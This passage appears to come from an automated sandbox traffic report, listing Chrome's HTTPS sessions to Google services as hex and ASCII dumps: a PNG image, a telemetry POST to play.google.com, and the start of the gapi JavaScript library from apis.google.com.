                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 07 f2 49 44 41 54 78 01 c5 9a 03 f0 ec ea 12 c4 9f 6d a3 74 6d db 38 36 af 6d db b6 6d 9b 87 d7 b6 6d db 58 6f b0 f8 b3 5f 7e b5 e7 4d 6d e5 26 df e6 78 ab ba b2 15 76 cf f4 cc f7 05 3f 9a 13 bf 20 08 7e 5e a9 54 56 2e 97 cb fb 7a 9e 77 4b 84 97 ab d5 aa 1f 2d eb 60 c6 ff 77 a3 e5 1d 11 8e 8f f6 1b e0 fb fe 1f 7f 34 bf 7f 11 89 e5 22 1c 13 91 7a 36 5a e6 22 92 8a 96 a9 60 3b 40 d0 0c 91 e7 21 86 00 cc 53 e2 51 b4 c7 45 04 ee 8b d0 4c 24 eb 10 60 30 31 9e 10 53 28 14 76 8a c4 fc 76 6e 13 5f 19 e2 ee 48 bb 05 b8 10 9d ff cd 48 c4 66 73 9c 38 29 c6 2a f8 d9 08 cd 71 01 96 11 84 5c 1f ed ff f7 39 42 3e f2 e9 7f 29 3e 23 32 17 05 c4 b3 41 8d cd 16 f9 7a bd
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR00WIDATxmtm86mmmXo_~Mm&xv? ~^TV.zwK-`w4"z6Z"`;@!SQEL$`01S(vvn_HHfs8)*q\9B>)>#2Az
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1372INData Raw: eb dc e4 dd b8 cf fa 3e f3 f9 b4 e8 43 a8 eb e5 a1 0a 8e 5e 50 b9 01 43 db db 25 91 87 3c 84 20 36 e3 18 cf 39 07 82 2c e7 24 30 78 de 4d de 3d cd 60 5c f8 ff 4d 49 2e 91 7c d8 a3 b0 f0 8a fa 1e ff b5 fa 5e fe 83 ea 57 2d 22 88 e7 87 0c 40 04 85 4a fb b3 1e 9e 92 c5 b9 06 ee 4b 98 6d ee 91 1c fd 68 a7 ba d4 78 ef 48 f5 3e f4 63 f5 3e f1 77 21 a2 eb 9e ff aa b4 c5 3a 58 8a 62 25 92 76 cc bc 16 c0 ed 29 93 b6 5b 52 09 84 2d fb f4 3e f2 2b 21 a0 e7 b1 3f ab f7 b9 3f 8a ff 95 9d 16 51 e5 91 47 3a 46 bf a7 e1 a9 b7 6b d6 d0 ac 41 d2 29 60 2a 02 5e 4e 24 1f d4 e5 7b 39 f5 3c bb 50 44 fc 8f 90 37 60 29 d6 33 eb 64 bf d4 0c 06 9e 8e 9d 12 68 af 6b 03 ed 7b 5d 26 d8 be 3b 5e 1e 68 ca 73 3e 42 52 45 50 bb 58 c8 4f 8b 7e 50 7c 5b 10 8e 0b c0 52 5d af 6d 2c bf a1 b4
                                                                                                                                                                                                                                                                                          Data Ascii: >C^PC%< 69,$0xM=`\MI.|^W-"@JKmhxH>c>w!:Xb%v)[R->+!??QG:FkA)`*^N${9<PD7`)3dhk{]&;^hs>BREPXO~P|[R]m,


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          37192.168.2.749782142.250.185.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1057OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 1990
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1990OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 32 37 34 34 38 30 37 36 30 34 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],373,[["1727448076047",null,null,null,
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                          Set-Cookie: NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ; expires=Sat, 29-Mar-2025 14:41:18 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          38192.168.2.749787142.250.186.784435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC885OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: apis.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI; OGPC=19037049-1:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 126135
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Thu, 26 Sep 2024 10:43:14 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 26 Sep 2025 10:43:14 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 06 Sep 2024 22:07:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Age: 100685
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 62 61 2c 66 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 75 61 2c 77 61 3b 62 61 3d 66 75 6e
                                                                                                                                                                                                                                                                                          Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);var ba,fa,ha,na,oa,sa,ua,wa;ba=fun
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20
                                                                                                                                                                                                                                                                                          Data Ascii: rn a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 62 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 75 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74
                                                                                                                                                                                                                                                                                          Data Ascii: defined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:ba(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ua=typeof Object.assign=="function"?Object
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 30 3b 74 68 69 73 2e 51 72 3d 5b 5d 3b 74 68 69 73 2e 6a 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 58 64 61 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 56 4a 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 58 64 61 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                          Data Ascii: 0;this.Qr=[];this.jV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Xda),reject:h(this.VJ)}};e.prototype.Xda=funct
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 51 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 51 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 5a 4f 28 74 68 69 73 2e 51 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 51 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 44 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 6c 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 45 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 6b 2c 6c 2e 72 65 73 6f 6c 76
                                                                                                                                                                                                                                                                                          Data Ascii: ototype.G7=function(){if(this.Qr!=null){for(var h=0;h<this.Qr.length;++h)f.ZO(this.Qr[h]);this.Qr=null}};var f=new b;e.prototype.Dfa=function(h){var k=this.jF();h.ly(k.resolve,k.reject)};e.prototype.Efa=function(h,k){var l=this.jF();try{h.call(k,l.resolv
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 66 26 26 63 3c 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 3d 62 5b 68 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 68 3e 3d 66 7d
                                                                                                                                                                                                                                                                                          Data Ascii: regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for(var h=0;h<f&&c<e;)if(d[c++]!=b[h++])return!1;return h>=f}
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 73 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26
                                                                                                                                                                                                                                                                                          Data Ascii: this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return this};k.prototype.get=function(l){return c(l)&&sa(l,f)?l[f][this.Ga]:void 0};k.prototype.has=function(l){return c(l)&
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 78 74 2c 6b 2e 65 66 2e 6e 65 78 74 2e 55 6b 3d 0a 6b 2e 65 66 2e 55 6b 2c 6b 2e 65 66 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 55 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 65 66 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 28 6b 3d 64 28 74 68 69 73 2c 6b 29 2e 65 66 29 26 26 6b 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                          Data Ascii: xt,k.ef.next.Uk=k.ef.Uk,k.ef.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Uk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).ef};c.prototype.get=function(k){return(k=d(this,k).ef)&&k.value};c.protot
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72
                                                                                                                                                                                                                                                                                          Data Ascii: size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||f.value[0].x!=4||f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 3a 28 65 2d 3d 36 35 35 33 36 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 26 31 30 32 33 7c 35 36 33 32 30 29 29 7d 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6e 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e
